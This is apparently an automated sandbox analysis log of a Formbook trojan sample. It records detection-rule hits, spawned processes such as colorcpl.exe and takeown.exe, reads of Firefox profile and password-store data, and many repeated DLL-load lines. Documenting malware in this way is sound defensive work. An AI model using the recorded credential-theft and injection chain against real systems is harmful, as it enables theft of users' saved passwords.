              Source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@11/8
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A97FD2 GetDiskFreeSpaceA,0_2_02A97FD2
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAAD98 CreateToolhelp32Snapshot,0_2_02AAAD98
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA6DC8 CoCreateInstance,0_2_02AA6DC8
              Source: C:\Windows\SysWOW64\takeown.exe File created: C:\Users\user~1\AppData\Local\Temp\dGg-0-kL
              Source: C:\Users\user\Desktop\z10982283782.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\z10982283782.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: takeown.exe, 0000000D.00000002.2488818800.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1713491005.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2488818800.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2488818800.00000000009D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: z10982283782.exe ReversingLabs: Detection: 52%
              Source: z10982283782.exe Virustotal: Detection: 54%
              Source: C:\Users\user\Desktop\z10982283782.exe File read: C:\Users\user\Desktop\z10982283782.exe
              Source: unknown Process created: C:\Users\user\Desktop\z10982283782.exe "C:\Users\user\Desktop\z10982283782.exe"
              Source: C:\Users\user\Desktop\z10982283782.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
              Source: C:\Windows\SysWOW64\takeown.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: url.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: ieframe.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: netapi32.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: wkscli.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\z10982283782.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
